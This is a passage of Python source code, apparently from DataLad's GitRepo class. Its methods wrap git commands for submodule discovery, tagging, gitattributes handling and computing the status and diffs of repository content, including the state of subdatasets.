Use the status() method instead.\n\n Despite its name, it also reports on untracked datasets, and\n yields their names with trailing path separators.\n \"\"\"\n return [\n '{}{}'.format(\n str(p.relative_to(self.pathobj)),\n os.sep if props['type'] != 'file' else ''\n )\n for p, props in self.status(\n untracked='all', eval_submodule_state='no').items()\n if props.get('state', None) == 'untracked'\n ]\n\n def gc(self, allow_background: bool = False, auto: bool = False) -> None:\n \"\"\"Perform house keeping (garbage collection, repacking)\"\"\"\n cmd_options = []\n if not allow_background:\n cmd_options += ['-c', 'gc.autodetach=0']\n cmd_options += ['gc', '--aggressive']\n if auto:\n cmd_options += ['--auto']\n self.call_git(cmd_options)\n\n def _parse_gitmodules(self) -> dict[PurePosixPath, dict[str, str]]:\n # TODO read .gitconfig from Git blob?\n gitmodules = self.pathobj / '.gitmodules'\n if not gitmodules.exists():\n return {}\n # pull out file content\n out = self.call_git(\n ['config', '-z', '-l', '--file', '.gitmodules'],\n read_only=True)\n # abuse our config parser\n # disable multi-value report, because we could not deal with them\n # anyways, and they should not appear in a normal .gitmodules file\n # but could easily appear when duplicates are included. In this case,\n # we better not crash\n db, _ = parse_gitconfig_dump(out, cwd=self.path, multi_value=False)\n mods: dict[str, dict[str, str]] = {}\n for k, v in db.items():\n if not k.startswith('submodule.'):\n # we don't know what this is\n lgr.warning(\"Skip unrecognized .gitmodule specification: %s=%s\", k, v)\n continue\n k_l = k.split('.')\n # module name is everything after 'submodule.' that is not the variable\n # name\n mod_name = '.'.join(k_l[1:-1])\n # variable name is the last 'dot-free' segment in the key\n mods.setdefault(mod_name, {})[k_l[-1]] = v\n\n out = {}\n # bring into traditional shape\n for name, props in mods.items():\n if 'path' not in props:\n lgr.warning(\"Failed to get '%s.path', skipping this submodule\", name)\n continue\n modprops = {'gitmodule_{}'.format(k): v\n for k, v in props.items()\n if not k.startswith('__')}\n # Keep as PurePosixPath for possible normalization of / in the path etc\n modpath = PurePosixPath(props['path'])\n modprops['gitmodule_name'] = name\n out[modpath] = modprops\n return out\n\n def get_submodules_(self, paths: Optional[list[str | PathLike[str]]] = None) -> Iterator[dict]:\n \"\"\"Yield submodules in this repository.\n\n Parameters\n ----------\n paths : list(pathlib.PurePath), optional\n Restrict submodules to those under `paths`. Paths must be relative\n to the resolved repository root, and must be normed to match the\n reporting done by Git, i.e. 
no parent dir components\n (ala \"some/../this\").\n\n Returns\n -------\n A generator that yields a dictionary with information for each\n submodule.\n \"\"\"\n if not (self.pathobj / \".gitmodules\").exists():\n return\n\n modinfo = self._parse_gitmodules()\n if not modinfo:\n # we exit early, if there is nothing on record (even though\n # a .gitmodules file exists).\n # without this conditional exit, we would be able to discover\n # subprojects even when they are not recorded in .gitmodules,\n # but at the cost of running an unconstrained ls-files call\n # below\n return\n\n posix_mod_paths = [m.as_posix() for m in modinfo]\n if paths:\n # harmonize them into relative to the repository\n posix_paths = []\n for path in paths:\n path = ut.PurePath(path)\n if path.is_absolute():\n try:\n path = path.relative_to(self.pathobj)\n except ValueError as exc:\n lgr.debug(\n \"Path %s it not underneath %s, skipping since nothing should match it: %s\",\n path, self.pathobj, CapturedException(exc)\n )\n continue\n posix_paths.append(path.as_posix())\n\n # constrain the report by the given paths, make sure all paths are POSIX\n posix_mod_paths = list(get_filtered_paths_(\n posix_mod_paths,\n posix_paths,\n include_within_path=True,\n ))\n\n for r in self.call_git_items_(\n ['ls-files', '--stage', '-z'],\n sep='\\0',\n files=posix_mod_paths,\n read_only=True,\n keep_ends=True,\n ):\n if not r.startswith('160000'):\n # make sure this method never talks about non-dataset\n # content\n continue\n props, rpath = r.split('\\t')\n mode, gitsha, stage = props.split(' ')\n if stage not in ('0', '2'):\n # we either have non-merge situation, or a simple merge\n # situation (i.e. stage=0). the reported gitsha always\n # matches what we have locally.\n # or we are in a three-way merge, in which case stage=2\n # is what we want to report, because it matches the\n # current HEAD (see git-read-tree manpage).\n # there is either a stage 2 or stage 0, never both\n continue\n # remove the expected line separator from the path\n rpath = rpath[:-1]\n path = PurePosixPath(rpath)\n yield dict(\n path=self.pathobj / rpath, # full path returned here\n type='dataset',\n gitshasum=gitsha,\n **modinfo.get(path, {})\n )\n\n def get_submodules(self, sorted_: bool = True, paths: Optional[list[str | PathLike[str]]] = None) -> list[dict]:\n \"\"\"Return list of submodules.\n\n Parameters\n ----------\n sorted_ : bool, optional\n Sort submodules by path name.\n paths : list(pathlib.PurePath), optional\n Restrict submodules to those under `paths`.\n\n Returns\n -------\n List of submodule namedtuples if `compat` is true or otherwise a list\n of dictionaries as returned by `get_submodules_`.\n \"\"\"\n xs = self.get_submodules_(paths=paths)\n\n if sorted_:\n return sorted(xs, key=lambda x: x[\"path\"])\n else:\n return list(xs)\n\n def update_ref(self, ref: str, value: str, oldvalue: Optional[str] = None, symbolic: bool = False) -> None:\n \"\"\"Update the object name stored in a ref \"safely\".\n\n Just a shim for `git update-ref` call if not symbolic, and\n `git symbolic-ref` if symbolic\n\n Parameters\n ----------\n ref : str\n Reference, such as `ref/heads/BRANCHNAME` or HEAD.\n value : str\n Value to update to, e.g. hexsha of a commit when updating for a\n branch ref, or branch ref if updating HEAD\n oldvalue: str\n Value to update from. Safeguard to be verified by git. This is only\n valid if `symbolic` is not True.\n symbolic : None\n To instruct if ref is symbolic, e.g. 
should be used in case of\n ref=HEAD\n \"\"\"\n if symbolic:\n if oldvalue:\n raise ValueError(\"oldvalue and symbolic must not be given both\")\n cmd = ['symbolic-ref', ref, value]\n else:\n cmd = ['update-ref', ref, value] + ([oldvalue] if oldvalue else [])\n self.call_git(cmd)\n\n def tag(self, tag: str, message: Optional[str] = None, commit: Optional[str] = None, options: Optional[list[str]] = None) -> None:\n \"\"\"Tag a commit\n\n Parameters\n ----------\n tag : str\n Custom tag label. Must be a valid tag name.\n message : str, optional\n If provided, adds ['-m', <message>] to the list of `git tag`\n arguments.\n commit : str, optional\n If provided, will be appended as last argument to the `git tag` call,\n and can be used to identify the commit that shall be tagged, if\n not HEAD.\n options : list, optional\n Additional command options, inserted prior a potential `commit`\n argument.\n \"\"\"\n # TODO: call in save.py complains about extensive logging. When does it\n # happen in what way? Figure out, whether to just silence it or raise or\n # whatever else.\n args = ['tag']\n if message:\n args += ['-m', message]\n if options is not None:\n args.extend(options)\n args.append(tag)\n if commit:\n args.append(commit)\n self.call_git(args)\n\n @overload\n def get_tags(self, output: None = None) -> list[dict[str, str]]:\n ...\n\n @overload\n def get_tags(self, output: str) -> list[str]:\n ...\n\n def get_tags(self, output: Optional[str] = None) -> list[dict[str, str]] | list[str]:\n \"\"\"Get list of tags\n\n Parameters\n ----------\n output : str, optional\n If given, limit the return value to a list of values matching that\n particular key of the tag properties.\n\n Returns\n -------\n list\n Each item is a dictionary with information on a tag. At present\n this includes 'hexsha', and 'name', where the latter is the string\n label of the tag, and the former the hexsha of the object the tag\n is attached to. The list is sorted by the creator date (committer\n date for lightweight tags and tagger date for annotated tags), with\n the most recent commit being the last element.\n \"\"\"\n tags = [\n dict(\n name=t['refname:strip=2'],\n hexsha=t['object'] if t['object'] else t['objectname'],\n )\n for t in self.for_each_ref_(\n fields=['refname:strip=2', 'objectname', 'object'],\n pattern='refs/tags',\n sort='creatordate')\n ]\n if output:\n return [t[output] for t in tags]\n else:\n return tags\n\n def describe(self, commitish: Optional[str] = None, **kwargs: Option) -> Optional[str]:\n \"\"\" Quick and dirty implementation to call git-describe\n\n Parameters\n ----------\n kwargs:\n transformed to cmdline options for git-describe;\n see __init__ for description of the transformation\n \"\"\"\n # TODO: be more precise what failure to expect when and raise actual\n # errors\n cmd = ['describe'] + to_options(True, **kwargs)\n if commitish is not None:\n cmd.append(commitish)\n try:\n describe = self.call_git(cmd, expect_fail=True)\n return describe.strip()\n except Exception:\n return None\n\n def get_tracking_branch(self, branch: Optional[str] = None, remote_only: bool = False) -> tuple[Optional[str], Optional[str]]:\n \"\"\"Get the tracking branch for `branch` if there is any.\n\n Parameters\n ----------\n branch: str\n local branch to look up. 
If none is given, active branch is used.\n remote_only : bool\n Don't return a value if the upstream remote is set to \".\" (meaning\n this repository).\n\n Returns\n -------\n tuple\n (remote or None, refspec or None) of the tracking branch\n \"\"\"\n if branch is None:\n branch = self.get_corresponding_branch() or self.get_active_branch()\n if branch is None:\n return None, None\n\n track_remote = self.config.get('branch.{0}.remote'.format(branch), None)\n if remote_only and track_remote == \".\":\n return None, None\n track_branch = self.config.get('branch.{0}.merge'.format(branch), None)\n return track_remote, track_branch\n\n @property\n def count_objects(self) -> dict[str, int]:\n \"\"\"return dictionary with count, size(in KiB) information of git objects\n \"\"\"\n\n count_cmd = ['count-objects', '-v']\n count_str = self.call_git(count_cmd)\n count = {key: int(value)\n for key, value in [item.split(': ')\n for item in count_str.split('\\n')\n if len(item.split(': ')) == 2]}\n return count\n\n def get_git_attributes(self) -> dict[str, str | bool]:\n \"\"\"Query gitattributes which apply to top level directory\n\n It is a thin compatibility/shortcut wrapper around more versatile\n get_gitattributes which operates on a list of paths and returns\n a dictionary per each path\n\n Returns\n -------\n dict:\n a dictionary with attribute name and value items relevant for the\n top ('.') directory of the repository, and thus most likely the\n default ones (if not overwritten with more rules) for all files within\n repo.\n \"\"\"\n return self.get_gitattributes('.')['.']\n\n def get_gitattributes(self, path: str | list[str], index_only: bool = False) -> dict[str, dict[str, str | bool]]:\n \"\"\"Query gitattributes for one or more paths\n\n Parameters\n ----------\n path: path or list\n Path(s) to query. Paths may be relative or absolute.\n index_only: bool\n Flag whether to consider only gitattribute setting that are reflected\n in the repository index, not just in the work tree content.\n\n Returns\n -------\n dict:\n Each key is a queried path (always relative to the repository root),\n each value is a dictionary with attribute\n name and value items. Attribute values are either True or False,\n for set and unset attributes, or are the literal attribute value.\n \"\"\"\n path = ensure_list(path)\n cmd = [\"check-attr\", \"-z\", \"--all\"]\n if index_only:\n cmd.append('--cached')\n # make sure we have one entry for each query path to\n # simplify work with the result\n attributes: dict[str, dict[str, str | bool]] = {p: {} for p in path}\n attr = []\n for item in self.call_git_items_(cmd, files=path, sep='\\0',\n read_only=True):\n attr.append(item)\n if len(attr) < 3:\n continue\n # we have a full record\n p, name, value = attr\n attrs = attributes[p]\n attrs[name] = \\\n True if value == 'set' else False if value == 'unset' else value\n # done, reset item\n attr = []\n return {relpath(k, self.path) if isabs(k) else k: v\n for k, v in attributes.items()}\n\n def set_gitattributes(self, attrs: list[tuple[str, dict[str, str | bool]]], attrfile: str = '.gitattributes', mode: str = 'a') -> None:\n \"\"\"Set gitattributes\n\n By default appends additional lines to `attrfile`. Note, that later\n lines in `attrfile` overrule earlier ones, which may or may not be\n what you want. 
Set `mode` to 'w' to replace the entire file by\n what you provided in `attrs`.\n\n Parameters\n ----------\n attrs : list\n Each item is a 2-tuple, where the first element is a path pattern,\n and the second element is a dictionary with attribute key/value\n pairs. The attribute dictionary must use the same semantics as those\n returned by `get_gitattributes()`. Path patterns can use absolute paths,\n in which case they will be normalized relative to the directory\n that contains the target .gitattributes file (see `attrfile`).\n attrfile: path\n Path relative to the repository root of the .gitattributes file the\n attributes shall be set in.\n mode: str\n 'a' to append .gitattributes, 'w' to replace it\n \"\"\"\n\n git_attributes_file = op.join(self.path, attrfile)\n attrdir = op.dirname(git_attributes_file)\n if not op.exists(attrdir):\n os.makedirs(attrdir)\n\n with open(git_attributes_file, mode + '+') as f:\n # for append, fix existing files that do not end with \\n\n if mode == 'a' and f.tell():\n f.seek(max(0, f.tell() - len(os.linesep)))\n if not f.read().endswith('\\n'):\n f.write('\\n')\n\n for pattern, attr in sorted(attrs, key=lambda x: x[0]):\n # normalize the pattern relative to the target .gitattributes file\n npath = _normalize_path(\n op.join(self.path, op.dirname(attrfile)), pattern)\n # paths in gitattributes always have to be POSIX\n npath = Path(npath).as_posix()\n attrline = u''\n if npath.count(' '):\n # quote patterns with spaces\n attrline += u'\"{}\"'.format(npath.replace('\"', '\\\\\"'))\n else:\n attrline += npath\n for a in sorted(attr):\n val = attr[a]\n if val is True:\n attrline += ' {}'.format(a)\n elif val is False:\n attrline += ' -{}'.format(a)\n else:\n attrline += ' {}={}'.format(a, val)\n f.write('{}\\n'.format(attrline))\n\n def get_content_info(self, paths: Optional[Sequence[str | PathLike[str]]] = None, ref: Optional[str] = None, untracked: str = 'all') -> dict[Path, dict[str, str | int | None]]:\n \"\"\"Get identifier and type information from repository content.\n\n This is simplified front-end for `git ls-files/tree`.\n\n Both commands differ in their behavior when queried about subdataset\n paths. ls-files will not report anything, ls-tree will report on the\n subdataset record. This function uniformly follows the behavior of\n ls-tree (report on the respective subdataset mount).\n\n Parameters\n ----------\n paths : list(pathlib.PurePath) or None\n Specific paths, relative to the resolved repository root, to query\n info for. Paths must be normed to match the reporting done by Git,\n i.e. no parent dir components (ala \"some/../this\").\n If `None`, info is reported for all content.\n ref : gitref or None\n If given, content information is retrieved for this Git reference\n (via ls-tree), otherwise content information is produced for the\n present work tree (via ls-files). 
With a given reference, the\n reported content properties also contain a 'bytesize' record,\n stating the size of a file in bytes.\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported when no `ref` was given:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n\n `gitshasum`\n SHASUM of the item as tracked by Git, or None, if not\n tracked. This could be different from the SHASUM of the file\n in the worktree, if it was modified.\n\n Raises\n ------\n ValueError\n In case of an invalid Git reference (e.g. 'HEAD' in an empty\n repository)\n \"\"\"\n lgr.debug('%s.get_content_info(...)', self)\n # TODO limit by file type to replace code in subdatasets command\n info: dict[Path, dict[str, str | int | None]] = dict()\n\n if paths: # is not None separate after\n # path matching will happen against what Git reports\n # and Git always reports POSIX paths\n # any incoming path has to be relative already, so we can simply\n # convert unconditionally\n # note: will be list-ified below\n posix_paths = [ut.PurePath(p).as_posix() for p in paths]\n elif paths is not None:\n return info\n else:\n posix_paths = None\n\n if posix_paths and (not ref or external_versions[\"cmd:git\"] >= \"2.29.0\"):\n # If a path points within a submodule, we need to map it to the\n # containing submodule before feeding it to ls-files or ls-tree.\n #\n # Before Git 2.29.0, ls-tree and ls-files differed in how they\n # reported paths within submodules: ls-files provided no output,\n # and ls-tree listed the submodule. 
Now they both return no output.\n submodules = [s[\"path\"].relative_to(self.pathobj).as_posix()\n for s in self.get_submodules_()]\n # `paths` get normalized into PurePosixPath above, submodules are POSIX as well\n posix_paths = get_parent_paths(posix_paths, submodules)\n\n # this will not work in direct mode, but everything else should be\n # just fine\n if not ref:\n # make sure no operations are pending before we figure things\n # out in the worktree\n self.precommit()\n\n # --exclude-standard will make sure to honor and standard way\n # git can be instructed to ignore content, and will prevent\n # crap from contaminating untracked file reports\n cmd = ['ls-files', '--stage', '-z']\n # untracked report mode, using labels from `git diff` option style\n if untracked == 'all':\n cmd += ['--exclude-standard', '-o']\n elif untracked == 'normal':\n cmd += ['--exclude-standard', '-o', '--directory', '--no-empty-directory']\n elif untracked == 'no':\n pass\n else:\n raise ValueError(\n 'unknown value for `untracked`: {}'.format(untracked))\n props_re = re.compile(\n r'(?P<type>[0-9]+) (?P<sha>.*) (.*)\\t(?P<fname>.*)$')\n else:\n cmd = ['ls-tree', ref, '-z', '-r', '--full-tree', '-l']\n props_re = re.compile(\n r'(?P<type>[0-9]+) ([a-z]*) (?P<sha>[^ ]*) [\\s]*(?P<size>[0-9-]+)\\t(?P<fname>.*)$')\n\n lgr.debug('Query repo: %s', cmd)\n try:\n stdout = self.call_git(\n cmd,\n files=posix_paths,\n expect_fail=True,\n read_only=True)\n except CommandError as exc:\n if \"fatal: Not a valid object name\" in exc.stderr:\n raise InvalidGitReferenceError(ref)\n raise\n lgr.debug('Done query repo: %s', cmd)\n\n self._get_content_info_line_helper(\n ref,\n info,\n stdout.split('\\0'),\n props_re)\n\n lgr.debug('Done %s.get_content_info(...)', self)\n return info\n\n def _get_content_info_line_helper(self, ref: Optional[str], info: dict[Path, dict[str, str | int | None]], lines: list[str], props_re: Pattern[str]) -> None:\n \"\"\"Internal helper of get_content_info() to parse Git output\"\"\"\n mode_type_map = {\n '100644': 'file',\n '100755': 'file',\n '120000': 'symlink',\n '160000': 'dataset',\n }\n for line in lines:\n if not line:\n continue\n inf: dict[str, str | int | None] = {}\n props = props_re.match(line)\n if not props:\n # Kludge: Filter out paths starting with .git/ to work around\n # an `ls-files -o` bug that was fixed in Git 2.25.\n #\n # TODO: Drop this condition when GIT_MIN_VERSION is at least\n # 2.25.\n if line.startswith(\".git/\"):\n lgr.debug(\"Filtering out .git/ file: %s\", line)\n continue\n # not known to Git, but Git always reports POSIX\n path = ut.PurePosixPath(line)\n inf['gitshasum'] = None\n else:\n # again Git reports always in POSIX\n path = ut.PurePosixPath(props.group('fname'))\n\n # revisit the file props after this path has not been rejected\n if props:\n inf['gitshasum'] = props.group('sha')\n inf['type'] = mode_type_map.get(\n props.group('type'), props.group('type'))\n\n if ref and inf['type'] == 'file':\n inf['bytesize'] = int(props.group('size'))\n\n # join item path with repo path to get a universally useful\n # path representation with auto-conversion and tons of other\n # stuff\n joinedpath = self.pathobj.joinpath(path)\n if 'type' not in inf:\n # be nice and assign types for untracked content\n inf['type'] = 'symlink' if joinedpath.is_symlink() \\\n else 'directory' if joinedpath.is_dir() else 'file'\n info[joinedpath] = inf\n\n def status(self, paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str= 'all', eval_submodule_state: 
Literal[\"commit\", \"full\", \"no\"] = 'full') -> dict[Path, dict[str, str]]:\n \"\"\"Simplified `git status` equivalent.\n\n Parameters\n ----------\n paths : list or None\n If given, limits the query to the specified paths. To query all\n paths specify `None`, not an empty list. If a query path points\n into a subdataset, a report is made on the subdataset record\n within the queried dataset only (no recursion).\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n eval_submodule_state : {'full', 'commit', 'no'}\n If 'full' (the default), the state of a submodule is evaluated by\n considering all modifications, with the treatment of untracked files\n determined by `untracked`. If 'commit', the modification check is\n restricted to comparing the submodule's HEAD commit to the one\n recorded in the superdataset. If 'no', the state of the subdataset is\n not evaluated.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n `state`\n Can be 'added', 'untracked', 'clean', 'deleted', 'modified'.\n \"\"\"\n lgr.debug('Query status of %r for %s paths',\n self, len(paths) if paths is not None else 'all')\n return self.diffstatus(\n fr='HEAD' if self.get_hexsha() else None,\n to=None,\n paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state)\n\n def diff(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all',\n eval_submodule_state: Literal[\"commit\", \"full\", \"no\"] = 'full') -> dict[Path, dict[str, str]]:\n \"\"\"Like status(), but reports changes between to arbitrary revisions\n\n Parameters\n ----------\n fr : str or None\n Revision specification (anything that Git understands). Passing\n `None` considers anything in the target state as new.\n to : str or None\n Revision specification (anything that Git understands), or None\n to compare to the state of the work tree.\n paths : list or None\n If given, limits the query to the specified paths. To query all\n paths specify `None`, not an empty list.\n untracked : {'no', 'normal', 'all'}\n If and how untracked content is reported when `to` is None:\n 'no': no untracked files are reported; 'normal': untracked files\n and entire untracked directories are reported as such; 'all': report\n individual files even in fully untracked directories.\n eval_submodule_state : {'full', 'commit', 'no'}\n If 'full' (the default), the state of a submodule is evaluated by\n considering all modifications, with the treatment of untracked files\n determined by `untracked`. If 'commit', the modification check is\n restricted to comparing the submodule's HEAD commit to the one\n recorded in the superdataset. 
If 'no', the state of the subdataset is\n not evaluated.\n\n Returns\n -------\n dict\n Each content item has an entry under a pathlib `Path` object instance\n pointing to its absolute path inside the repository (this path is\n guaranteed to be underneath `Repo.path`).\n Each value is a dictionary with properties:\n\n `type`\n Can be 'file', 'symlink', 'dataset', 'directory'\n `state`\n Can be 'added', 'untracked', 'clean', 'deleted', 'modified'.\n \"\"\"\n return {k: v for k, v in self.diffstatus(\n fr=fr, to=to, paths=paths,\n untracked=untracked,\n eval_submodule_state=eval_submodule_state).items()\n if v.get('state', None) != 'clean'}\n\n @overload\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all', *, eval_submodule_state: Literal[\"global\"], _cache: Optional[dict] = None) -> str:\n ...\n\n @overload\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all', eval_submodule_state: Literal[\"commit\", \"full\", \"no\"] = \"full\", _cache: Optional[dict] = None) -> dict[Path, dict[str, str]]:\n ...\n\n def diffstatus(self, fr: Optional[str], to: Optional[str], paths: Optional[Sequence[str | PathLike[str]]] = None, untracked: str = 'all',\n eval_submodule_state: str = 'full', _cache: Optional[dict] = None) -> dict[Path, dict[str, str]] | str:\n\n \"\"\"Like diff(), but reports the status of 'clean' content too.\n\n It supports an additional submodule evaluation state 'global'.\n If given, it will return a single 'modified'\n (vs. 'clean') state label for the entire repository, as soon as\n it can.\n \"\"\"\n def _get_cache_key(label: str, paths: Optional[list[Path]], ref: Optional[str], untracked: Optional[str] = None) -> tuple[str, str, Optional[tuple[Path, ...]], Optional[str], Optional[str]]:\n return self.path, label, tuple(paths) if paths else None, \\\n ref, untracked\n\n if _cache is None:\n _cache = {}\n\n ppaths: Optional[list[Path]]\n if paths is not None:\n # at this point we must normalize paths to the form that\n # Git would report them, to easy matching later on\n ppaths = [\n p.relative_to(self.pathobj) if p.is_absolute() else p\n for p in map(ut.Path, paths)\n ]\n else:\n ppaths = None\n\n # TODO report more info from get_content_info() calls in return\n # value, those are cheap and possibly useful to a consumer\n # we need (at most) three calls to git\n if to is None:\n # everything we know about the worktree, including os.stat\n # for each file\n key = _get_cache_key('ci', ppaths, None, untracked)\n if key in _cache:\n to_state = _cache[key]\n else:\n to_state = self.get_content_info(\n paths=ppaths, ref=None, untracked=untracked)\n _cache[key] = to_state\n # we want Git to tell us what it considers modified and avoid\n # reimplementing logic ourselves\n key = _get_cache_key('mod', ppaths, None)\n if key in _cache:\n modified = _cache[key]\n else:\n # from Git 2.31.0 onwards ls-files has --deduplicate\n # by for backward compatibility keep doing deduplication here\n modified = set(\n self.pathobj.joinpath(ut.PurePosixPath(p))\n for p in self.call_git_items_(\n # we must also look for deleted files, for the logic\n # below to work. 
Only from Git 2.31.0 would they be\n # included with `-m` alone\n ['ls-files', '-z', '-m', '-d'],\n # low-level code cannot handle pathobjs\n files=[str(p) for p in ppaths] if ppaths is not None else None,\n sep='\\0',\n read_only=True)\n if p)\n _cache[key] = modified\n else:\n key = _get_cache_key('ci', ppaths, to)\n if key in _cache:\n to_state = _cache[key]\n else:\n to_state = self.get_content_info(paths=ppaths, ref=to)\n _cache[key] = to_state\n # we do not need worktree modification detection in this case\n modified = None\n # origin state\n key = _get_cache_key('ci', ppaths, fr)\n if key in _cache:\n from_state = _cache[key]\n else:\n if fr:\n from_state = self.get_content_info(paths=ppaths, ref=fr)\n else:\n # no ref means from nothing\n from_state = {}\n _cache[key] = from_state\n\n status = dict()\n for f, to_state_r in to_state.items():\n props = self._diffstatus_get_state_props(\n f,\n from_state.get(f, None),\n to_state_r,\n # are we comparing against a recorded commit or the worktree\n to is not None,\n # if we have worktree modification info, report if\n # path is reported as modified in it\n modified and f in modified,\n eval_submodule_state)\n # potential early exit in \"global\" eval mode\n if eval_submodule_state == 'global' and \\\n props.get('state', None) not in ('clean', None):\n # any modification means globally 'modified'\n return 'modified'\n status[f] = props\n\n for f, from_state_r in from_state.items():\n if f not in to_state:\n # we new this, but now it is gone and Git is not complaining\n # about it being missing -> properly deleted and deletion\n # stages\n status[f] = dict(\n state='deleted',\n type=from_state_r['type'],\n # report the shasum to distinguish from a plainly vanished\n # file\n gitshasum=from_state_r['gitshasum'],\n )\n if eval_submodule_state == 'global':\n return 'modified'\n\n if to is not None or eval_submodule_state == 'no':\n # if we have `to` we are specifically comparing against\n # a recorded state, and this function only attempts\n # to label the state of a subdataset, not investigate\n # specifically what the changes in subdatasets are\n # this is done by a high-level command like rev-diff\n # so the comparison within this repo and the present\n # `state` label are all we need, and they are done already\n if eval_submodule_state == 'global':\n return 'clean'\n else:\n return status\n\n # loop over all subdatasets and look for additional modifications\n for f, st in status.items():\n f = str(f)\n if 'state' in st or not st['type'] == 'dataset':\n # no business here\n continue\n if not GitRepo.is_valid_repo(f):\n # submodule is not present, no chance for a conflict\n st['state'] = 'clean'\n continue\n # we have to recurse into the dataset and get its status\n subrepo = repo_from_path(f)\n # get the HEAD commit, or the one of the corresponding branch\n # only that one counts re super-sub relationship\n # save() syncs the corresponding branch each time\n subrepo_commit = subrepo.get_hexsha(subrepo.get_corresponding_branch())\n st['gitshasum'] = subrepo_commit\n # subdataset records must be labeled clean up to this point\n # test if current commit in subdataset deviates from what is\n # recorded in the dataset\n st['state'] = 'modified' \\\n if st['prev_gitshasum'] != subrepo_commit \\\n else 'clean'\n if eval_submodule_state == 'global' and st['state'] == 'modified':\n return 'modified'\n if eval_submodule_state == 'commit':\n continue\n # the recorded commit did not change, so we need to make\n # a more expensive traversal\n 
st['state'] = subrepo.diffstatus(\n # we can use 'HEAD' because we know that the commit\n # did not change. using 'HEAD' will facilitate\n # caching the result\n fr='HEAD',\n to=None,\n paths=None,\n untracked=untracked,\n eval_submodule_state='global',\n _cache=_cache) if st['state'] == 'clean' else 'modified'\n if eval_submodule_state == 'global' and st['state'] == 'modified':\n return 'modified'\n\n if eval_submodule_state == 'global':\n return 'clean'\n else:\n return status\n\n def _diffstatus_get_state_props(self, f: Path,\n from_state: Optional[dict[str, str]],\n to_state: dict[str, str],\n against_commit: bool,\n modified_in_worktree: bool,\n eval_submodule_state: str) -> dict[str, str]:\n \"\"\"Helper to determine diff properties for a single path\n\n Parameters\n ----------\n f : Path\n from_state : dict\n to_state : dict\n against_commit : bool\n Flag whether `to_state` reflects a commit or the worktree.\n modified_in_worktree : bool\n Flag whether a worktree modification is reported. This is ignored\n when `against_commit` is True.\n eval_submodule_state : {'commit', 'no', ...}\n \"\"\"\n if against_commit:\n # we can ignore any worktree modification reported when\n # comparing against a commit\n modified_in_worktree = False\n\n props = {}\n if 'type' in to_state:\n props['type'] = to_state['type']\n\n to_sha = to_state['gitshasum']\n from_sha = from_state['gitshasum'] if from_state else None\n\n # determine the state of `f` from from_state and to_state records, if\n # it can be determined conclusively from it. If not, it will\n # stay None for now\n state = None\n if not from_state:\n # this is new, or rather not known to the previous state\n state = 'added' if to_sha else 'untracked'\n elif to_sha == from_sha and not modified_in_worktree:\n # something that is seemingly unmodified, based on the info\n # gathered so far\n if to_state['type'] == 'dataset':\n if against_commit or eval_submodule_state == 'commit':\n # we compare against a recorded state, just based on\n # the shas we can be confident, otherwise the state\n # of a subdataset isn't fully known yet, because\n # `modified_in_worktree` will only reflect changes\n # in the commit of a subdataset without looking into\n # it for uncommitted changes. Such tests are done\n # later and based on further conditionals for\n # performance reasons\n state = 'clean'\n else:\n # no change in git record, and no change on disk\n # at this point we know that the reported object ids\n # for this file are identical in the to and from\n # records. If to is None, we're comparing to the\n # working tree and a deleted file will still have an\n # identical id, so we need to check whether the file is\n # gone before declaring it clean. This working tree\n # check is irrelevant and wrong if to is a ref.\n state = 'clean' \\\n if against_commit or (f.exists() or f.is_symlink()) \\\n else 'deleted'\n else:\n # change in git record, or on disk\n # for subdatasets leave the 'modified' judgement to the caller\n # for supporting corner cases, such as adjusted branch\n # which require inspection of a subdataset\n # TODO we could have a new file that is already staged\n # but had subsequent modifications done to it that are\n # unstaged. 
Such file would presently show up as 'added'\n # ATM I think this is OK, but worth stating...\n state = ('modified'\n if against_commit or to_state['type'] != 'dataset'\n else None\n ) if f.exists() or f.is_symlink() else 'deleted'\n # TODO record before and after state for diff-like use\n # cases\n\n if state in ('clean', 'added', 'modified', None):\n # assign present gitsha to any record\n # state==None can only happen for subdatasets that\n # already existed, so also assign a sha for them\n props['gitshasum'] = to_sha\n if 'bytesize' in to_state:\n # if we got this cheap, report it\n props['bytesize'] = to_state['bytesize']\n elif state == 'clean':\n assert from_state is not None\n if 'bytesize' in from_state:\n # no change, we can take this old size info\n props['bytesize'] = from_state['bytesize']\n if state in ('clean', 'modified', 'deleted', None):\n # assign previous gitsha to any record\n # state==None can only happen for subdatasets that\n # already existed, so also assign a sha for them\n assert from_sha is not None\n props['prev_gitshasum'] = from_sha\n if state:\n # only report a state if we could determine any\n # outside code tests for existence of the property\n # and not (always) for the value\n props['state'] = state\n return props\n\n def _save_pre(self, paths: Optional[Sequence[str | PathLike[str]]], _status: Optional[dict[Path, dict[str, str]]], **kwargs: Any) -> Optional[dict[Path, dict[str, str]]]:\n # helper to get an actionable status report\n if paths is not None and not paths and not _status:\n return None\n if _status is None:\n if 'untracked' not in kwargs:\n kwargs['untracked'] = 'normal'\n status = self.status(\n paths=paths,\n **{k: kwargs[k] for k in kwargs\n if k in ('untracked', 'eval_submodule_state')})\n else:\n # we want to be able to add items down the line\n # make sure to detach from prev. owner\n status = _status.copy()\n return status\n\n def get_staged_paths(self) -> list[str]:\n \"\"\"Returns a list of any stage repository path(s)\n\n This is a rather fast call, as it will not depend on what is going on\n in the worktree.\n \"\"\"\n try:\n return list(self.call_git_items_(\n ['diff', 